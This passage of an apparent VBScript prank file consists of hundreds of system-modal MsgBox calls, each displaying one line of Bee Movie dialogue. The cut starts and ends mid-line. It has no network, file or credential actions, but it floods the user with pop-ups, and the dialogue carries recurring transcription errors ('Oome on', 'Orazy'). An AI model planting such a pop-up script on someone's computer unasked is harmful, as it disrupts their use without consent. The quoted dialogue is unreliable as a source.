shouldn't.",4096,"Bee") x=MsgBox("- Have some.",4096,"Bee") x=MsgBox("- No, I can't.",4096,"Bee") x=MsgBox("- Oome on!",4096,"Bee") x=MsgBox("I'm trying to lose a couple micrograms.",4096,"Bee") x=MsgBox("- Where?",4096,"Bee") x=MsgBox("- These stripes don't help.",4096,"Bee") x=MsgBox("You look great!",4096,"Bee") x=MsgBox("I don't know if you know",4096,"Bee") x=MsgBox("anything about fashion.",4096,"Bee") x=MsgBox("Are you all right?",4096,"Bee") x=MsgBox("No.",4096,"Bee") x=MsgBox("He's making the tie in the cab",4096,"Bee") x=MsgBox("as they're flying up Madison.",4096,"Bee") x=MsgBox("He finally gets there.",4096,"Bee") x=MsgBox("He runs up the steps into the church.",4096,"Bee") x=MsgBox("The wedding is on.",4096,"Bee") x=MsgBox("And he says, " & Chr(34) & "Watermelon?",4096,"Bee") x=MsgBox("I thought you said Guatemalan.",4096,"Bee") x=MsgBox("Why would I marry a watermelon?" & Chr(34) & "",4096,"Bee") x=MsgBox("Is that a bee joke?",4096,"Bee") x=MsgBox("That's the kind of stuff we do.",4096,"Bee") x=MsgBox("Yeah, different.",4096,"Bee") x=MsgBox("So, what are you gonna do, Barry?",4096,"Bee") x=MsgBox("About work? I don't know.",4096,"Bee") x=MsgBox("I want to do my part for the hive,",4096,"Bee") x=MsgBox("but I can't do it the way they want.",4096,"Bee") x=MsgBox("I know how you feel.",4096,"Bee") x=MsgBox("- You do?",4096,"Bee") x=MsgBox("- Sure.",4096,"Bee") x=MsgBox("My parents wanted me to be a lawyer or",4096,"Bee") x=MsgBox("a doctor, but I wanted to be a florist.",4096,"Bee") x=MsgBox("- Really?",4096,"Bee") x=MsgBox("- My only interest is flowers.",4096,"Bee") x=MsgBox("Our new queen was just elected",4096,"Bee") x=MsgBox("with that same campaign slogan.",4096,"Bee") x=MsgBox("Anyway, if you look...",4096,"Bee") x=MsgBox("There's my hive right there. See it?",4096,"Bee") x=MsgBox("You're in Sheep Meadow!",4096,"Bee") x=MsgBox("Yes! I'm right off the Turtle Pond!",4096,"Bee") x=MsgBox("No way! I know that area.",4096,"Bee") x=MsgBox("I lost a toe ring there once.",4096,"Bee") x=MsgBox("- Why do girls put rings on their toes?",4096,"Bee") x=MsgBox("- Why not?",4096,"Bee") x=MsgBox("- It's like putting a hat on your knee.",4096,"Bee") x=MsgBox("- Maybe I'll try that.",4096,"Bee") x=MsgBox("- You all right, ma'am?",4096,"Bee") x=MsgBox("- Oh, yeah. Fine.",4096,"Bee") x=MsgBox("Just having two cups of coffee!",4096,"Bee") x=MsgBox("Anyway, this has been great.",4096,"Bee") x=MsgBox("Thanks for the coffee.",4096,"Bee") x=MsgBox("Yeah, it's no trouble.",4096,"Bee") x=MsgBox("Sorry I couldn't finish it. If I did,",4096,"Bee") x=MsgBox("I'd be up the rest of my life.",4096,"Bee") x=MsgBox("Are you...?",4096,"Bee") x=MsgBox("Oan I take a piece of this with me?",4096,"Bee") x=MsgBox("Sure! Here, have a crumb.",4096,"Bee") x=MsgBox("- Thanks!",4096,"Bee") x=MsgBox("- Yeah.",4096,"Bee") x=MsgBox("All right. Well, then...",4096,"Bee") x=MsgBox("I guess I'll see you around.",4096,"Bee") x=MsgBox("Or not.",4096,"Bee") x=MsgBox("OK, Barry.",4096,"Bee") x=MsgBox("And thank you",4096,"Bee") x=MsgBox("so much again... for before.",4096,"Bee") x=MsgBox("Oh, that? That was nothing.",4096,"Bee") x=MsgBox("Well, not nothing, but... Anyway...",4096,"Bee") x=MsgBox("This can't possibly work.",4096,"Bee") x=MsgBox("He's all set to go.",4096,"Bee") x=MsgBox("We may as well try it.",4096,"Bee") x=MsgBox("OK, Dave, pull the chute.",4096,"Bee") x=MsgBox("- Sounds amazing.",4096,"Bee") x=MsgBox("- It was amazing!",4096,"Bee") x=MsgBox("It was the scariest,",4096,"Bee") x=MsgBox("happiest moment of my life.",4096,"Bee") x=MsgBox("Humans! I can't believe",4096,"Bee") x=MsgBox("you were with humans!",4096,"Bee") x=MsgBox("Giant, scary humans!",4096,"Bee") x=MsgBox("What were they like?",4096,"Bee") x=MsgBox("Huge and crazy. They talk crazy.",4096,"Bee") x=MsgBox("They eat crazy giant things.",4096,"Bee") x=MsgBox("They drive crazy.",4096,"Bee") x=MsgBox("- Do they try and kill you, like on TV?",4096,"Bee") x=MsgBox("- Some of them. But some of them don't.",4096,"Bee") x=MsgBox("- How'd you get back?",4096,"Bee") x=MsgBox("- Poodle.",4096,"Bee") x=MsgBox("You did it, and I'm glad. You saw",4096,"Bee") x=MsgBox("whatever you wanted to see.",4096,"Bee") x=MsgBox("You had your " & Chr(34) & "experience." & Chr(34) & " Now you",4096,"Bee") x=MsgBox("can pick out yourjob and be normal.",4096,"Bee") x=MsgBox("- Well...",4096,"Bee") x=MsgBox("- Well?",4096,"Bee") x=MsgBox("Well, I met someone.",4096,"Bee") x=MsgBox("You did? Was she Bee-ish?",4096,"Bee") x=MsgBox("- A wasp?! Your parents will kill you!",4096,"Bee") x=MsgBox("- No, no, no, not a wasp.",4096,"Bee") x=MsgBox("- Spider?",4096,"Bee") x=MsgBox("- I'm not attracted to spiders.",4096,"Bee") x=MsgBox("I know it's the hottest thing,",4096,"Bee") x=MsgBox("with the eight legs and all.",4096,"Bee") x=MsgBox("I can't get by that face.",4096,"Bee") x=MsgBox("So who is she?",4096,"Bee") x=MsgBox("She's... human.",4096,"Bee") x=MsgBox("No, no. That's a bee law.",4096,"Bee") x=MsgBox("You wouldn't break a bee law.",4096,"Bee") x=MsgBox("- Her name's Vanessa.",4096,"Bee") x=MsgBox("- Oh, boy.",4096,"Bee") x=MsgBox("She's so nice. And she's a florist!",4096,"Bee") x=MsgBox("Oh, no! You're dating a human florist!",4096,"Bee") x=MsgBox("We're not dating.",4096,"Bee") x=MsgBox("You're flying outside the hive, talking",4096,"Bee") x=MsgBox("to humans that attack our homes",4096,"Bee") x=MsgBox("with power washers and M-80s!",4096,"Bee") x=MsgBox("One-eighth a stick of dynamite!",4096,"Bee") x=MsgBox("She saved my life!",4096,"Bee") x=MsgBox("And she understands me.",4096,"Bee") x=MsgBox("This is over!",4096,"Bee") x=MsgBox("Eat this.",4096,"Bee") x=MsgBox("This is not over! What was that?",4096,"Bee") x=MsgBox("- They call it a crumb.",4096,"Bee") x=MsgBox("- It was so stingin' stripey!",4096,"Bee") x=MsgBox("And that's not what they eat.",4096,"Bee") x=MsgBox("That's what falls off what they eat!",4096,"Bee") x=MsgBox("- You know what a Oinnabon is?",4096,"Bee") x=MsgBox("- No.",4096,"Bee") x=MsgBox("It's bread and cinnamon and frosting.",4096,"Bee") x=MsgBox("They heat it up...",4096,"Bee") x=MsgBox("Sit down!",4096,"Bee") x=MsgBox("...really hot!",4096,"Bee") x=MsgBox("- Listen to me!",4096,"Bee") x=MsgBox("We are not them! We're us.",4096,"Bee") x=MsgBox("There's us and there's them!",4096,"Bee") x=MsgBox("Yes, but who can deny",4096,"Bee") x=MsgBox("the heart that is yearning?",4096,"Bee") x=MsgBox("There's no yearning.",4096,"Bee") x=MsgBox("Stop yearning. Listen to me!",4096,"Bee") x=MsgBox("You have got to start thinking bee,",4096,"Bee") x=MsgBox("my friend. Thinking bee!",4096,"Bee") x=MsgBox("- Thinking bee.",4096,"Bee") x=MsgBox("- Thinking bee.",4096,"Bee") x=MsgBox("Thinking bee! Thinking bee!",4096,"Bee") x=MsgBox("Thinking bee! Thinking bee!",4096,"Bee") x=MsgBox("There he is. He's in the pool.",4096,"Bee") x=MsgBox("You know what your problem is, Barry?",4096,"Bee") x=MsgBox("I gotta start thinking bee?",4096,"Bee") x=MsgBox("How much longer will this go on?",4096,"Bee") x=MsgBox("It's been three days!",4096,"Bee") x=MsgBox("Why aren't you working?",4096,"Bee") x=MsgBox("I've got a lot of big life decisions",4096,"Bee") x=MsgBox("to think about.",4096,"Bee") x=MsgBox("What life? You have no life!",4096,"Bee") x=MsgBox("You have no job. You're barely a bee!",4096,"Bee") x=MsgBox("Would it kill you",4096,"Bee") x=MsgBox("to make a little honey?",4096,"Bee") x=MsgBox("Barry, come out.",4096,"Bee") x=MsgBox("Your father's talking to you.",4096,"Bee") x=MsgBox("Martin, would you talk to him?",4096,"Bee") x=MsgBox("Barry, I'm talking to you!",4096,"Bee") x=MsgBox("You coming?",4096,"Bee") x=MsgBox("Got everything?",4096,"Bee") x=MsgBox("All set!",4096,"Bee") x=MsgBox("Go ahead. I'll catch up.",4096,"Bee") x=MsgBox("Don't be too long.",4096,"Bee") x=MsgBox("Watch this!",4096,"Bee") x=MsgBox("Vanessa!",4096,"Bee") x=MsgBox("- We're still here.",4096,"Bee") x=MsgBox("- I told you not to yell at him.",4096,"Bee") x=MsgBox("He doesn't respond to yelling!",4096,"Bee") x=MsgBox("- Then why yell at me?",4096,"Bee") x=MsgBox("- Because you don't listen!",4096,"Bee") x=MsgBox("I'm not listening to this.",4096,"Bee") x=MsgBox("Sorry, I've gotta go.",4096,"Bee") x=MsgBox("- Where are you going?",4096,"Bee") x=MsgBox("- I'm meeting a friend.",4096,"Bee") x=MsgBox("A girl? Is this why you can't decide?",4096,"Bee") x=MsgBox("Bye.",4096,"Bee") x=MsgBox("I just hope she's Bee-ish.",4096,"Bee") x=MsgBox("They have a huge parade",4096,"Bee") x=MsgBox("of flowers every year in Pasadena?",4096,"Bee") x=MsgBox("To be in the Tournament of Roses,",4096,"Bee") x=MsgBox("that's every florist's dream!",4096,"Bee") x=MsgBox("Up on a float, surrounded",4096,"Bee") x=MsgBox("by flowers, crowds cheering.",4096,"Bee") x=MsgBox("A tournament. Do the roses",4096,"Bee") x=MsgBox("compete in athletic events?",4096,"Bee") x=MsgBox("No. All right, I've got one.",4096,"Bee") x=MsgBox("How come you don't fly everywhere?",4096,"Bee") x=MsgBox("It's exhausting. Why don't you",4096,"Bee") x=MsgBox("run everywhere? It's faster.",4096,"Bee") x=MsgBox("Yeah, OK, I see, I see.",4096,"Bee") x=MsgBox("All right, your turn.",4096,"Bee") x=MsgBox("TiVo. You can just freeze live TV?",4096,"Bee") x=MsgBox("That's insane!",4096,"Bee") x=MsgBox("You don't have that?",4096,"Bee") x=MsgBox("We have Hivo, but it's a disease.",4096,"Bee") x=MsgBox("It's a horrible, horrible disease.",4096,"Bee") x=MsgBox("Oh, my.",4096,"Bee") x=MsgBox("Dumb bees!",4096,"Bee") x=MsgBox("You must want to sting all those jerks.",4096,"Bee") x=MsgBox("We try not to sting.",4096,"Bee") x=MsgBox("It's usually fatal for us.",4096,"Bee") x=MsgBox("So you have to watch your temper.",4096,"Bee") x=MsgBox("Very carefully.",4096,"Bee") x=MsgBox("You kick a wall, take a walk,",4096,"Bee") x=MsgBox("write an angry letter and throw it out.",4096,"Bee") x=MsgBox("Work through it like any emotion:",4096,"Bee") x=MsgBox("Anger, jealousy, lust.",4096,"Bee") x=MsgBox("Oh, my goodness! Are you OK?",4096,"Bee") x=MsgBox("Yeah.",4096,"Bee") x=MsgBox("- What is wrong with you?!",4096,"Bee") x=MsgBox("- It's a bug.",4096,"Bee") x=MsgBox("He's not bothering anybody.",4096,"Bee") x=MsgBox("Get out of here, you creep!",4096,"Bee") x=MsgBox("What was that? A Pic 'N' Save circular?",4096,"Bee") x=MsgBox("Yeah, it was. How did you know?",4096,"Bee") x=MsgBox("It felt like about 10 pages.",4096,"Bee") x=MsgBox("Seventy-five is pretty much our limit.",4096,"Bee") x=MsgBox("You've really got that",4096,"Bee") x=MsgBox("down to a science.",4096,"Bee") x=MsgBox("- I lost a cousin to Italian Vogue.",4096,"Bee") x=MsgBox("- I'll bet.",4096,"Bee") x=MsgBox("What in the name",4096,"Bee") x=MsgBox("of Mighty Hercules is this?",4096,"Bee") x=MsgBox("How did this get here?",4096,"Bee") x=MsgBox("Oute Bee, Golden Blossom,",4096,"Bee") x=MsgBox("Ray Liotta Private Select?",4096,"Bee") x=MsgBox("- Is he that actor?",4096,"Bee") x=MsgBox("- I never heard of him.",4096,"Bee") x=MsgBox("- Why is this here?",4096,"Bee") x=MsgBox("- For people. We eat it.",4096,"Bee") x=MsgBox("You don't have",4096,"Bee") x=MsgBox("enough food of your own?",4096,"Bee") x=MsgBox("- Well, yes.",4096,"Bee") x=MsgBox("- How do you get it?",4096,"Bee") x=MsgBox("- Bees make it.",4096,"Bee") x=MsgBox("- I know who makes it!",4096,"Bee") x=MsgBox("And it's hard to make it!",4096,"Bee") x=MsgBox("There's heating, cooling, stirring.",4096,"Bee") x=MsgBox("You need a whole Krelman thing!",4096,"Bee") x=MsgBox("- It's organic.",4096,"Bee") x=MsgBox("- It's our-ganic!",4096,"Bee") x=MsgBox("It's just honey, Barry.",4096,"Bee") x=MsgBox("Just what?!",4096,"Bee") x=MsgBox("Bees don't know about this!",4096,"Bee") x=MsgBox("This is stealing! A lot of stealing!",4096,"Bee") x=MsgBox("You've taken our homes, schools,",4096,"Bee") x=MsgBox("hospitals! This is all we have!",4096,"Bee") x=MsgBox("And it's on sale?!",4096,"Bee") x=MsgBox("I'm getting to the bottom of this.",4096,"Bee") x=MsgBox("I'm getting to the bottom",4096,"Bee") x=MsgBox("of all of this!",4096,"Bee") x=MsgBox("Hey, Hector.",4096,"Bee") x=MsgBox("- You almost done?",4096,"Bee") x=MsgBox("- Almost.",4096,"Bee") x=MsgBox("He is here. I sense it.",4096,"Bee") x=MsgBox("Well, I guess I'll go home now",4096,"Bee") x=MsgBox("and just leave this nice honey out,",4096,"Bee") x=MsgBox("with no one around.",4096,"Bee") x=MsgBox("You're busted, box boy!",4096,"Bee") x=MsgBox("I knew I heard something.",4096,"Bee") x=MsgBox("So you can talk!",4096,"Bee") x=MsgBox("I can talk.",4096,"Bee") x=MsgBox("And now you'll start talking!",4096,"Bee") x=MsgBox("Where you getting the sweet stuff?",4096,"Bee") x=MsgBox("Who's your supplier?",4096,"Bee") x=MsgBox("I don't understand.",4096,"Bee") x=MsgBox("I thought we were friends.",4096,"Bee") x=MsgBox("The last thing we want",4096,"Bee") x=MsgBox("to do is upset bees!",4096,"Bee") x=MsgBox("You're too late! It's ours now!",4096,"Bee") x=MsgBox("You, sir, have crossed",4096,"Bee") x=MsgBox("the wrong sword!",4096,"Bee") x=MsgBox("You, sir, will be lunch",4096,"Bee") x=MsgBox("for my iguana, Ignacio!",4096,"Bee") x=MsgBox("Where is the honey coming from?",4096,"Bee") x=MsgBox("Tell me where!",4096,"Bee") x=MsgBox("Honey Farms! It comes from Honey Farms!",4096,"Bee") x=MsgBox("Orazy person!",4096,"Bee") x=MsgBox("What horrible thing has happened here?",4096,"Bee") x=MsgBox("These faces, they never knew",4096,"Bee") x=MsgBox("what hit them. And now",4096,"Bee") x=MsgBox("they're on the road to nowhere!",4096,"Bee") x=MsgBox("Just keep still.",4096,"Bee") x=MsgBox("What? You're not dead?",4096,"Bee") x=MsgBox("Do I look dead? They will wipe anything",4096,"Bee") x=MsgBox("that moves. Where you headed?",4096,"Bee") x=MsgBox("To Honey Farms.",4096,"Bee") x=MsgBox("I am onto something huge here.",4096,"Bee") x=MsgBox("I'm going to Alaska. Moose blood,",4096,"Bee") x=MsgBox("crazy stuff. Blows your head off!",4096,"Bee") x=MsgBox("I'm going to Tacoma.",4096,"Bee") x=MsgBox("- And you?",4096,"Bee") x=MsgBox("- He really is dead.",4096,"Bee") x=MsgBox("All right.",4096,"Bee") x=MsgBox("Uh-oh!",4096,"Bee") x=MsgBox("- What is that?!",4096,"Bee") x=MsgBox("- Oh, no!",4096,"Bee") x=MsgBox("- A wiper! Triple blade!",4096,"Bee") x=MsgBox("- Triple blade?",4096,"Bee") x=MsgBox("Jump on! It's your only chance, bee!",4096,"Bee") x=MsgBox("Why does everything have",4096,"Bee") x=MsgBox("to be so doggone clean?!",4096,"Bee") x=MsgBox("How much do you people need to see?!",4096,"Bee") x=MsgBox("Open your eyes!",4096,"Bee") x=MsgBox("Stick your head out the window!",4096,"Bee") x=MsgBox("From NPR News in Washington,",4096,"Bee") x=MsgBox("I'm Oarl Kasell.",4096,"Bee") x=MsgBox("But don't kill no more bugs!",4096,"Bee") x=MsgBox("- Bee!",4096,"Bee") x=MsgBox("- Moose blood guy!!",4096,"Bee") x=MsgBox("- You hear something?",4096,"Bee") x=MsgBox("- Like what?",4096,"Bee") x=MsgBox("Like tiny screaming.",4096,"Bee") x=MsgBox("Turn off the radio.",4096,"Bee") x=MsgBox("Whassup, bee boy?",4096,"Bee") x=MsgBox("Hey, Blood.",4096,"Bee") x=MsgBox("Just a row of honey jars,",4096,"Bee") x=MsgBox("as far as the eye could see.",4096,"Bee") x=MsgBox("Wow!",4096,"Bee") x=MsgBox("I assume wherever this truck goes",4096,"Bee") x=MsgBox("is where they're getting it.",4096,"Bee") x=MsgBox("I mean, that honey's ours.",4096,"Bee") x=MsgBox("- Bees hang tight.",4096,"Bee") x=MsgBox("- We're all jammed in.",4096,"Bee") x=MsgBox("It's a close community.",4096,"Bee") x=MsgBox("Not us, man. We on our own.",4096,"Bee") x=MsgBox("Every mosquito on his own.",4096,"Bee") x=MsgBox("- What if you get in trouble?",4096,"Bee") x=MsgBox("- You a mosquito, you in trouble.",4096,"Bee") x=MsgBox("Nobody likes us. They just smack.",4096,"Bee") x=MsgBox("See a mosquito, smack, smack!",4096,"Bee") x=MsgBox("At least you're out in the world.",4096,"Bee") x=MsgBox("You must meet girls.",4096,"Bee") x=MsgBox("Mosquito girls try to trade up,",4096,"Bee") x=MsgBox("get with a moth, dragonfly.",4096,"Bee") x=MsgBox("Mosquito girl don't want no mosquito.",4096,"Bee") x=MsgBox("You got to be kidding me!",4096,"Bee") x=MsgBox("Mooseblood's about to leave",4096,"Bee") x=MsgBox("the building! So long, bee!",4096,"Bee") x=MsgBox("- Hey, guys!",4096,"Bee") x=MsgBox("- Mooseblood!",4096,"Bee") x=MsgBox("I knew I'd catch y'all down here.",4096,"Bee") x=MsgBox("Did you bring your crazy straw?",4096,"Bee") x=MsgBox("We throw it in jars, slap a label on it,",4096,"Bee") x=MsgBox("and it's pretty much pure profit.",4096,"Bee") x=MsgBox("What is this place?",4096,"Bee") x=MsgBox("A bee's got a brain",4096,"Bee") x=MsgBox("the size of a pinhead.",4096,"Bee") x=MsgBox("They are pinheads!",4096,"Bee") x=MsgBox("Pinhead.",4096,"Bee") x=MsgBox("- Oheck out the new smoker.",4096,"Bee") x=MsgBox("- Oh, sweet. That's the one you want.",4096,"Bee") x=MsgBox("The Thomas 3000!",4096,"Bee") x=MsgBox("Smoker?",4096,"Bee") x=MsgBox("Ninety puffs a minute, semi-automatic.",4096,"Bee") x=MsgBox("Twice the nicotine, all the tar.",4096,"Bee") x=MsgBox("A couple breaths of this",4096,"Bee") x=MsgBox("knocks them right out.",4096,"Bee") x=MsgBox("They make the honey,",4096,"Bee") x=MsgBox("and we make the money.",4096,"Bee") x=MsgBox("" & Chr(34) & "They make the honey,",4096,"Bee") x=MsgBox("and we make the money" & Chr(34) & "?",4096,"Bee") x=MsgBox("Oh, my!",4096,"Bee") x=MsgBox("What's going on? Are you OK?",4096,"Bee") x=MsgBox("Yeah. It doesn't last too long.",4096,"Bee") x=MsgBox("Do you know you're",4096,"Bee") x=MsgBox("in a fake hive with fake walls?",4096,"Bee") x=MsgBox("Our queen was moved here.",4096,"Bee") x=MsgBox("We had no choice.",4096,"Bee") x=MsgBox("This is your queen?",4096,"Bee") x=MsgBox("That's a man in women's clothes!",4096,"Bee") x=MsgBox("That's a drag queen!",4096,"Bee") x=MsgBox("What is this?",4096,"Bee") x=MsgBox("Oh, no!",4096,"Bee") x=MsgBox("There's hundreds of them!",4096,"Bee") x=MsgBox("Bee honey.",4096,"Bee") x=MsgBox("Our honey is being brazenly stolen",4096,"Bee") x=MsgBox("on a massive scale!",4096,"Bee") x=MsgBox("This is worse than anything bears",4096,"Bee") x=MsgBox("have done! I intend to do something.",4096,"Bee") x=MsgBox("Oh, Barry, stop.",4096,"Bee") x=MsgBox("Who told you humans are taking",4096,"Bee") x=MsgBox("our honey? That's a rumor.",4096,"Bee") x=MsgBox("Do these look like rumors?",4096,"Bee") x=MsgBox("That's a conspiracy theory.",4096,"Bee") x=MsgBox("These are obviously doctored photos.",4096,"Bee") x=MsgBox("How did you get mixed up in this?",4096,"Bee") x=MsgBox("He's been talking to humans.",4096,"Bee") x=MsgBox("- What?",4096,"Bee") x=MsgBox("- Talking to humans?!",4096,"Bee") x=MsgBox("He has a human girlfriend.",4096,"Bee") x=MsgBox("And they make out!",4096,"Bee") x=MsgBox("Make out? Barry!",4096,"Bee") x=MsgBox("We do not.",4096,"Bee") x=MsgBox("- You wish you could.",4096,"Bee") x=MsgBox("- Whose side are you on?",4096,"Bee") x=MsgBox("The bees!",4096,"Bee") x=MsgBox("I dated a cricket once in San Antonio.",4096,"Bee") x=MsgBox("Those crazy legs kept me up all night.",4096,"Bee") x=MsgBox("Barry, this is what you want",4096,"Bee") x=MsgBox("to do with your life?",4096,"Bee") x=MsgBox("I want to do it for all our lives.",4096,"Bee") x=MsgBox("Nobody works harder than bees!",4096,"Bee") x=MsgBox("Dad, I remember you",4096,"Bee") x=MsgBox("coming home so overworked",4096,"Bee") x=MsgBox("your hands were still stirring.",4096,"Bee") x=MsgBox("You couldn't stop.",4096,"Bee") x=MsgBox("I remember that.",4096,"Bee") x=MsgBox("What right do they have to our honey?",4096,"Bee") x=MsgBox("We live on two cups a year. They put it",4096,"Bee") x=MsgBox("in lip balm for no reason whatsoever!",4096,"Bee") x=MsgBox("Even if it's true, what can one bee do?",4096,"Bee") x=MsgBox("Sting them where it really hurts.",4096,"Bee") x=MsgBox("In the face! The eye!",4096,"Bee") x=MsgBox("- That would hurt.",4096,"Bee") x=MsgBox("- No.",4096,"Bee") x=MsgBox("Up the nose? That's a killer.",4096,"Bee") x=MsgBox("There's only one place you can sting",4096,"Bee") x=MsgBox("the humans, one place where it matters.",4096,"Bee") x=MsgBox("Hive at Five, the hive's only",4096,"Bee") x=MsgBox("full-hour action news source.",4096,"Bee") x=MsgBox("No more bee beards!",4096,"Bee") x=MsgBox("With Bob Bumble at the anchor desk.",4096,"Bee") x=MsgBox("Weather with Storm Stinger.",4096,"Bee") x=MsgBox("Sports with Buzz Larvi.",4096,"Bee") x=MsgBox("And Jeanette Ohung.",4096,"Bee") x=MsgBox("- Good evening. I'm Bob Bumble.",4096,"Bee") x=MsgBox("- And I'm Jeanette Ohung.",4096,"Bee") x=MsgBox("A tri-county bee, Barry Benson,",4096,"Bee") x=MsgBox("intends to sue the human race",4096,"Bee") x=MsgBox("for stealing our honey,",4096,"Bee") x=MsgBox("packaging it and profiting",4096,"Bee") x=MsgBox("from it illegally!",4096,"Bee") x=MsgBox("Tomorrow night on Bee Larry King,",4096,"Bee") x=MsgBox("we'll have three former queens here in",4096,"Bee") x=MsgBox("our studio, discussing their new book,",4096,"Bee") x=MsgBox("Olassy Ladies,",4096,"Bee") x=MsgBox("out this week on Hexagon.",4096,"Bee") x=MsgBox("Tonight we're talking to Barry Benson.",4096,"Bee") x=MsgBox("Did you ever think, " & Chr(34) & "I'm a kid",4096,"Bee") x=MsgBox("from the hive. I can't do this" & Chr(34) & "?",4096,"Bee") x=MsgBox("Bees have never been afraid",4096,"Bee") x=MsgBox("to change the world.",4096,"Bee") x=MsgBox("What about Bee Oolumbus?",4096,"Bee") x=MsgBox("Bee Gandhi? Bejesus?",4096,"Bee") x=MsgBox("Where I'm from, we'd never sue humans.",4096,"Bee") x=MsgBox("We were thinking",4096,"Bee") x=MsgBox("of stickball or candy stores.",4096,"Bee") x=MsgBox("How old are you?",4096,"Bee") x=MsgBox("The bee community",4096,"Bee") x=MsgBox("is supporting you in this case,",4096,"Bee") x=MsgBox("which will be the trial",4096,"Bee") x=MsgBox("of the bee century.",4096,"Bee") x=MsgBox("You know, they have a Larry King",4096,"Bee") x=MsgBox("in the human world too.",4096,"Bee") x=MsgBox("It's a common name. Next week...",4096,"Bee") x=MsgBox("He looks like you and has a show",4096,"Bee") x=MsgBox("and suspenders and colored dots...",4096,"Bee") x=MsgBox("Next week...",4096,"Bee") x=MsgBox("Glasses, quotes on the bottom from the",4096,"Bee") x=MsgBox("guest even though you just heard 'em.",4096,"Bee") x=MsgBox("Bear Week next week!",4096,"Bee") x=MsgBox("They're scary, hairy and here live.",4096,"Bee") x=MsgBox("Always leans forward, pointy shoulders,",4096,"Bee") x=MsgBox("squinty eyes, very Jewish.",4096,"Bee") x=MsgBox("In tennis, you attack",4096,"Bee") x=MsgBox("at the point of weakness!",4096,"Bee") x=MsgBox("It was my grandmother, Ken. She's 81.",4096,"Bee") x=MsgBox("Honey, her backhand's a joke!",4096,"Bee") x=MsgBox("I'm not gonna take advantage of that?",4096,"Bee") x=MsgBox("Quiet, please.",4096,"Bee") x=MsgBox("Actual work going on here.",4096,"Bee") x=MsgBox("- Is that that same bee?",4096,"Bee") x=MsgBox("- Yes, it is!",4096,"Bee") x=MsgBox("I'm helping him sue the human race.",4096,"Bee") x=MsgBox("- Hello.",4096,"Bee") x=MsgBox("- Hello, bee.",4096,"Bee") x=MsgBox("This is Ken.",4096,"Bee") x=MsgBox("Yeah, I remember you. Timberland, size",4096,"Bee") x=MsgBox("ten and a half. Vibram sole, I believe.",4096,"Bee") x=MsgBox("Why does he talk again?",4096,"Bee") x=MsgBox("Listen, you better go",4096,"Bee") x=MsgBox("'cause we're really busy working.",4096,"Bee") x=MsgBox("But it's our yogurt night!",4096,"Bee") x=MsgBox("Bye-bye.",4096,"Bee") x=MsgBox("Why is yogurt night so difficult?!",4096,"Bee") x=MsgBox("You poor thing.",4096,"Bee") x=MsgBox("You two have been at this for hours!",4096,"Bee") x=MsgBox("Yes, and Adam here",4096,"Bee") x=MsgBox("has been a huge help.",4096,"Bee") x=MsgBox("- Frosting...",4096,"Bee") x=MsgBox("- How many sugars?",4096,"Bee") x=MsgBox("Just one. I try not",4096,"Bee") x=MsgBox("to use the competition.",4096,"Bee") x=MsgBox("So why are you helping me?",4096,"Bee") x=MsgBox("Bees have good qualities.",4096,"Bee") x=MsgBox("And it takes my mind off the shop.",4096,"Bee") x=MsgBox("Instead of flowers, people",4096,"Bee") x=MsgBox("are giving balloon bouquets now.",4096,"Bee") x=MsgBox("Those are great, if you're three.",4096,"Bee") x=MsgBox("And artificial flowers.",4096,"Bee") x=MsgBox("- Oh, those just get me psychotic!",4096,"Bee") x=MsgBox("- Yeah, me too.",4096,"Bee") x=MsgBox("Bent stingers, pointless pollination.",4096,"Bee") x=MsgBox("Bees must hate those fake things!",4096,"Bee") x=MsgBox("Nothing worse",4096,"Bee") x=MsgBox("than a daffodil that's had work done.",4096,"Bee") x=MsgBox("Maybe this could make up",4096,"Bee") x=MsgBox("for it a little bit.",4096,"Bee") x=MsgBox("- This lawsuit's a pretty big deal.",4096,"Bee") x=MsgBox("- I guess.",4096,"Bee") x=MsgBox("You sure you want to go through with it?",4096,"Bee") x=MsgBox("Am I sure? When I'm done with",4096,"Bee") x=MsgBox("the humans, they won't be able",4096,"Bee") x=MsgBox("to say, " & Chr(34) & "Honey, I'm home," & Chr(34) & "",4096,"Bee") x=MsgBox("without paying a royalty!",4096,"Bee") x=MsgBox("It's an incredible scene",4096,"Bee") x=MsgBox("here in downtown Manhattan,",4096,"Bee") x=MsgBox("where the world anxiously waits,",4096,"Bee") x=MsgBox("because for the first time in history,",4096,"Bee") x=MsgBox("we will hear for ourselves",4096,"Bee") x=MsgBox("if a honeybee can actually speak.",4096,"Bee") x=MsgBox("What have we gotten into here, Barry?",4096,"Bee") x=MsgBox("It's pretty big, isn't it?",4096,"Bee") x=MsgBox("I can't believe how many humans",4096,"Bee") x=MsgBox("don't work during the day.",4096,"Bee") x=MsgBox("You think billion-dollar multinational",4096,"Bee") x=MsgBox("food companies have good lawyers?",4096,"Bee") x=MsgBox("Everybody needs to stay",4096,"Bee") x=MsgBox("behind the barricade.",4096,"Bee") x=MsgBox("- What's the matter?",4096,"Bee") x=MsgBox("- I don't know, I just got a chill.",4096,"Bee") x=MsgBox("Well, if it isn't the bee team.",4096,"Bee") x=MsgBox("You boys work on this?",4096,"Bee") x=MsgBox("All rise! The Honorable",4096,"Bee") x=MsgBox("Judge Bumbleton presiding.",4096,"Bee") x=MsgBox("All right. Oase number 4475,",4096,"Bee") x=MsgBox("Superior Oourt of New York,",4096,"Bee") x=MsgBox("Barry Bee Benson v. the Honey Industry",4096,"Bee") x=MsgBox("is now in session.",4096,"Bee") x=MsgBox("Mr. Montgomery, you're representing",4096,"Bee") x=MsgBox("the five food companies collectively?",4096,"Bee") x=MsgBox("A privilege.",4096,"Bee") x=MsgBox("Mr. Benson... you're representing",4096,"Bee") x=MsgBox("all the bees of the world?",4096,"Bee") x=MsgBox("I'm kidding. Yes, Your Honor,",4096,"Bee") x=MsgBox("we're ready to proceed.",4096,"Bee") x=MsgBox("Mr. Montgomery,",4096,"Bee") x=MsgBox("your opening statement, please.",4096,"Bee") x=MsgBox("Ladies and gentlemen of the jury,",4096,"Bee") x=MsgBox("my grandmother was a simple woman.",4096,"Bee") x=MsgBox("Born on a farm, she believed",4096,"Bee") x=MsgBox("it was man's divine right",4096,"Bee") x=MsgBox("to benefit from the bounty",4096,"Bee") x=MsgBox("of nature God put before us.",4096,"Bee") x=MsgBox("If we lived in the topsy-turvy world",4096,"Bee") x=MsgBox("Mr. Benson imagines,",4096,"Bee") x=MsgBox("just think of what would it mean.",4096,"Bee") x=MsgBox("I would have to negotiate",4096,"Bee") x=MsgBox("with the silkworm",4096,"Bee") x=MsgBox("for the elastic in my britches!",4096,"Bee") x=MsgBox("Talking bee!",4096,"Bee") x=MsgBox("How do we know this isn't some sort of",4096,"Bee") x=MsgBox("holographic 